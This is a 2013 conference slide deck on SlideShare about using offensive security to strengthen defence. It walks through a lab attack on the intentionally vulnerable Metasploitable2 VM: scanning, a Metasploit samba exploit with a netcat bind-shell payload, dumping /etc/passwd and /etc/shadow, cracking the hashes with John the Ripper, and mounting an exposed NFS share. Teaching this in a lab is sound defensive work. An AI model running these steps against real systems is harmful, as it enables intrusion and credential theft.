“Improving your defensive security posture with offensive security strategies”
Andrew Kozma
HTCIA, Atlantic Chapter
Meetin...
A bit about me…
 Infosec professional working in healthcare
 Co-founder of AtlSecCon
 Midnight ethical hacker
 A perpe...
Offensive Security
 “How much can you know about yourself if you've never been in
a fight?”
~Chuck Palahniuk, Fight Club
...
Creating a practice environment
 “The first rule of fight club is, you don't talk about fight club.”
~Chuck Palahniuk, Fi...
Demo (metasploitable2)
 NMAP Scan
 Identify OS, Services and open ports
 Nessus Vuln Scan
 Run a scan to find vulnerab...
Demo (nmap)
• Scanning with nmap
-O OS Detection
-sV Service Version
-sC NSE Scripts
-oX Output in xml format
--stylesheet...
Demo (nmap output)
Demo (Nessus)
• Nessus Vulnerability Scanner
• Not native to Kali-Linux
• Download and install
• dpkg –i “filename”
• Regi...
Demo (Nessus)
• Launch the scan
• Nessus indicates the scan
progress
• A summary is displayed
once the scan is complete
Demo (Nessus)
• Export and save the report
Demo (Nessus Output)
Demo (metasploit)
• Opening the Metasploit
Framework Console
• Enter the command
“msfconsole”
• Importing our nmap scan
re...
Demo (metasploit)
• We can validate the
db_import by entering the
command “hosts” at the msf
prompt
• We can also validate...
Demo (metasploit)
• Import the nessus scan into
metasploit with command
“db_import /path to the file”
• Now that it is imp...
Demo (metasploit)
• For this demo we are going to
exploit samba
• Load the exploit in msf with the
command:
“use exploit/m...
Demo (metasploit)
• The command:
“show options” indicates
any variables that require
a value to be set
• For this exploit ...
Demo (metasploit)
• The command “show options” now
indicates the variables for RHOST
and PAYLOAD that we previously
defined
Demo (metasploit)
• We attack the target via the
command “exploit”
• Booyah! Shell access to the target!
• We have root le...
Demo (metasploit)
• Now we need to grab the
hashes associated with the user
accounts we just viewed
• This can be done by ...
Demo (Usernames and Hashes)
Demo (John The Ripper)
• We are going to use John The
Ripper to crack the passwords for
the user accounts
• For John to cr...
Demo (John The Ripper)
• We are going to take a quick peek
at the contents of the new file
• To do this we change to direc...
Demo (John The Ripper)
• To start cracking the password
with John we issue the
command: “john /path to the
filename.txt”
•...
Demo (Post Exploitation)
• Using our new creds to SSH to
the exploited workstation
• To connect via SSH we use the
command...
Demo (Post Exploitation)
• Lets review other services so that we can maintain a persistent
presence on the compromised wor...
Demo (Post Exploitation)
• Lets take a quick look at
the NFS share available
on the target
• Uh oh… everything is
shared
•...
Demo (Post Exploitation)
• Looking into the share that we
mounted…
• We already know we can copy the
contents of the passw...
Demo (Post Exploitation)
• Remember our Nessus output
• Collect as much information as
possible during the information
gat...
Breaking things to make them better
 “At the time, my life just seemed too complete, and maybe we
have to break everythin...
Advanced Persistent Response
 “On a long enough time line, the survival rate for everyone
drops to zero.” ~Chuck Palahniu...
Incident Response
 "With a gun barrel between your teeth, you speak only in vowels.“
~Chuck Palahniuk, Fight Club
 Prepa...
Parting thoughts
 Do you still think the best defense is a
good offense?
 IMHO ~ A good offense helps to make a
great de...
References
 Jeremy Druin @webpwnized has a great tutorial online going into more detail:
http://www.youtube.com/watch?v=0...
Thank you
 Twitter handle - @k0z1can
 ca.linkedin.com/in/andrewkozma/
The best defense is a good offense (April 2013 Presentation to Atlantic HTCIA chapter)
The best defense is a good offense (April 2013 Presentation to Atlantic HTCIA chapter)
Upcoming SlideShare
Loading in …5
×

The best defense is a good offense (April 2013 Presentation to Atlantic HTCIA chapter)

1,373 views

Published on

Published in: Technology
0 Comments
0 Likes
Statistics
Notes
  • Be the first to comment

  • Be the first to like this

No Downloads
Views
Total views
1,373
On SlideShare
0
From Embeds
0
Number of Embeds
2
Actions
Shares
0
Downloads
25
Comments
0
Likes
0
Embeds 0
No embeds

No notes for slide

The best defense is a good offense (April 2013 Presentation to Atlantic HTCIA chapter)

  1. 1. “Improving your defensive security posture with offensive security strategies” Andrew Kozma HTCIA, Atlantic Chapter Meeting April 18th, 2013
  2. 2. A bit about me…  Infosec professional working in healthcare  Co-founder of AtlSecCon  Midnight ethical hacker  A perpetual student  Security researcher/philosopher  Fan of the blues (Secretly want to learn how to play the harmonica)
  3. 3. Offensive Security  “How much can you know about yourself if you've never been in a fight?” ~Chuck Palahniuk, Fight Club  Hacking our own infrastructure to improve defensive security measures and processes  Tools – Kali Linux, a security distro maintained by Offensive- Security with all the tools required to test security, it’s free and always will be  Tactics – The application of tools  Strategy – The big picture, all the pieces working together to achieve an ultimate goal
  4. 4. Creating a practice environment  “The first rule of fight club is, you don't talk about fight club.” ~Chuck Palahniuk, Fight Club  The goal - a controlled environment where it is safe to practice offensive security techniques  There are many vulnerable distributions that can serve as targets to help build skills (@g0tmi1k’s www.vulnhub.com)  With proper planning and authorization along with an understanding of the risks you can test production infrastructure  Virtualization is a beautiful thing!
  5. 5. Demo (metasploitable2)  NMAP Scan  Identify OS, Services and open ports  Nessus Vuln Scan  Run a scan to find vulnerabilities that can potentially be exploited  Metasploit console  Import the info  Exploit the target  Post exploitation  Crack passwords with john  PWN the box
  6. 6. Demo (nmap) • Scanning with nmap -O OS Detection -sV Service Version -sC NSE Scripts -oX Output in xml format --stylesheet nmap.xsl --open --reason • Copying the stylesheet to our working directory • Displaying the nmap scan in Iceweasel (Kali-Linux Browser)
  7. 7. Demo (nmap output)
  8. 8. Demo (Nessus) • Nessus Vulnerability Scanner • Not native to Kali-Linux • Download and install • dpkg –i “filename” • Register for Home feed (free) • Connect to Local host port 8834 • Login and select new scan
  9. 9. Demo (Nessus) • Launch the scan • Nessus indicates the scan progress • A summary is displayed once the scan is complete
  10. 10. Demo (Nessus) • Export and save the report
  11. 11. Demo (Nessus Output)
  12. 12. Demo (metasploit) • Opening the Metasploit Framework Console • Enter the command “msfconsole” • Importing our nmap scan results into the metasploit database • Enter the command “db_import /path to the nmap scan”
  13. 13. Demo (metasploit) • We can validate the db_import by entering the command “hosts” at the msf prompt • We can also validate the services imported for that host from nmap by entering the command “services” at an msf prompt.
  14. 14. Demo (metasploit) • Import the nessus scan into metasploit with command “db_import /path to the file” • Now that it is imported into metasploit we can view the vulnerabilities that nessus detected with the command “vulns”
  15. 15. Demo (metasploit) • For this demo we are going to exploit samba • Load the exploit in msf with the command: “use exploit/multi/samba/usermap_script” • Once the exploit is loaded we can learn more about its functions via the command “info”
  16. 16. Demo (metasploit) • The command: “show options” indicates any variables that require a value to be set • For this exploit a Remote Host is required to be identified. We will use the command: “set RHOST target.ip.address” • A payload that will be delivered to the target is required we issue the command “set PAYLOAD cmd/unix/bind/netcat”
  17. 17. Demo (metasploit) • The command “show options” now indicates the variables for RHOST and PAYLOAD that we previously defined
  18. 18. Demo (metasploit) • We attack the target via the command “exploit” • Booyah! Shell access to the target! • We have root level access to the target and interact via this shell • Let’s display the target systems user accounts via the command “cat /etc/passwd” • We are going to select the data displayed and copy it to a .txt file
  19. 19. Demo (metasploit) • Now we need to grab the hashes associated with the user accounts we just viewed • This can be done by displaying the hashes via the command “cat /etc/shadow” • Once again we will be selecting the information displayed and will be copying it to a .txt file
  20. 20. Demo (Usernames and Hashes)
  21. 21. Demo (John The Ripper) • We are going to use John The Ripper to crack the passwords for the user accounts • For John to crack them we have to combine the usernames and their hash into a format that John can understand • We combine both files to a single one for John to crack with the command: “unshadow /path/passwd.txt /path/shadow.txt > unshadowed.txt” • We now have a file with usernames and hashes that John can use
  22. 22. Demo (John The Ripper) • We are going to take a quick peek at the contents of the new file • To do this we change to directory the file resides in “cd HTCIA” • We can display the contents of this file in the terminal with the command “cat unshadowed.txt”
  23. 23. Demo (John The Ripper) • To start cracking the password with John we issue the command: “john /path to the filename.txt” • John has loaded the hashes and has successfully cracked some of the passwords • Previously cracked passwords can be viewed with the command: “john –show /Path to the file.txt”
  24. 24. Demo (Post Exploitation) • Using our new creds to SSH to the exploited workstation • To connect via SSH we use the command: “ssh –l msfadmin Target.IP.Address” • Now we have a terminal session vs a shell • In the real world we could continue to install backdoors, steal data, pivot to scan for other hosts
  25. 25. Demo (Post Exploitation) • Lets review other services so that we can maintain a persistent presence on the compromised workstation • Hmmm NFS services are running on the target…
  26. 26. Demo (Post Exploitation) • Lets take a quick look at the NFS share available on the target • Uh oh… everything is shared • We are going to create a temp directory and then mount the share in it • Lets display the filesystem to see the NFS share mounted in temp
  27. 27. Demo (Post Exploitation) • Looking into the share that we mounted… • We already know we can copy the contents of the passwd and shadow files again
  28. 28. Demo (Post Exploitation) • Remember our Nessus output • Collect as much information as possible during the information gathering phase… • Sometimes you get lucky! The VNC server password was identified in the scan by Nessus
  29. 29. Breaking things to make them better  “At the time, my life just seemed too complete, and maybe we have to break everything to make something better out of ourselves.” ~Chuck Palahniuk, Fight Club  When you start looking at production systems it is important to have a demonstrated, repeatable process that has buy in from management  Document your findings indicating the threat, the likelihood of occurrence and the impact to the business  Use this information to build business cases for investment in security solutions  When you start looking at the production environment… there will be blood….
  30. 30. Advanced Persistent Response  “On a long enough time line, the survival rate for everyone drops to zero.” ~Chuck Palahniuk, Fight Club  Understanding trends and current threats  Filling in the gaps with security (Technology and process)  Creating and implementing a security model that meets organizational needs
  31. 31. Incident Response  "With a gun barrel between your teeth, you speak only in vowels.“ ~Chuck Palahniuk, Fight Club  Preparation  Have a plan, know who to call and when  Identification  Determination of whether or not there was an incident  Containment  Protecting other critical systems “stop the bleeding”  Eradication  Addressing the vulnerabilities that were exploited  Recovery  Returning to operational status  Follow up  Lessons learned, prevent future incidents of the same nature
  32. 32. Parting thoughts  Do you still think the best defense is a good offense?  IMHO ~ A good offense helps to make a great defense! (with proper planning and execution)
  33. 33. References  Jeremy Druin @webpwnized has a great tutorial online going into more detail: http://www.youtube.com/watch?v=0fbBwGAuINw  @netbiosx has a tutorial available online regarding NFS and metasploitable2: http://pentestlab.wordpress.com/2013/01/20/nfs-misconfiguration/  Nessus software and home feed licensing can be found on their site: http://www.tenable.com/  Kali-Linux can be obtained at www.kali.org and is maintained by Offensive-Security  Metasploitable2 is maintained by Rapid7 and is available for download from: https://community.rapid7.com/docs/DOC-1875  Why stop here! There are many other distros to help expand your skillset, check out @g0tmi1k and his website at http://vulnhub.com/
  34. 34. Thank you  Twitter handle - @k0z1can  ca.linkedin.com/in/andrewkozma/

×